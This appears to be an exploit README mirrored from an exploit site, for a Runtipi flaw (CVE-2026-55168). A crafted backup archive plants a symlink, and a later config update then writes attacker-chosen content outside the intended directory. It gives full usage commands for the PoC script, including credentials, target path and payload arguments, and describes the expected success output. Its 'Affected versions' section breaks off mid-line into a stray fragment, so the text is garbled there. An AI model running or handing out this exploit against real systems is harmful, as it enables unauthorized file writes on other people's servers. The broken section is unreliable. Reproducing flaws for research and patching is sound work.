Exploit for CVE-2026-55168

## https://sploitus.com/exploit?id=991EB70F-4BBC-503F-933C-F7F6F0BCFE29
# CVE-2026-55168

This repository contains a simple PoC for **CVE-2026-55168** in **Runtipi**.

The issue is an authenticated arbitrary file write that can be reached through the backup restore flow. A crafted backup archive can plant a symlink into restored application data, and a later normal config update follows that symlink and writes attacker-controlled content outside the intended directory.

Reference advisory:

- https://github.com/runtipi/runtipi/security/advisories/GHSA-wcrf-g9p9-2wg7

Affected versions:

- ` /data/state/proof.txt
```

After that, the normal request to update app config causes Runtipi to write the supplied content into:

```text
/data/state/proof.txt
```

So the important part is not just symlink persistence during restore, but the fact that a later legitimate write follows the planted symlink.

## Files

- `poc.py` — end-to-end Python PoC

## Usage

```bash
python poc.py \
  --base-url http://127.0.0.1:3001 \
  --username YOUR_USERNAME \
  --password YOUR_PASSWORD \
  --app-urn demoapp3:_user \
  --target-path /data/state/proof.txt \
  --write-content PWNED_FROM_USERCFG_WRITE
```

If you want, you can also save the generated archive locally:

```bash
python poc.py \
  --base-url http://127.0.0.1:3001 \
  --username YOUR_USERNAME \
  --password YOUR_PASSWORD \
  --output payload.tar.gz
```

## Expected result

If the target is vulnerable, the script finishes successfully and prints a small JSON result with `status: "ok"`.

## Notes

This PoC is provided for research and reproduction purposes.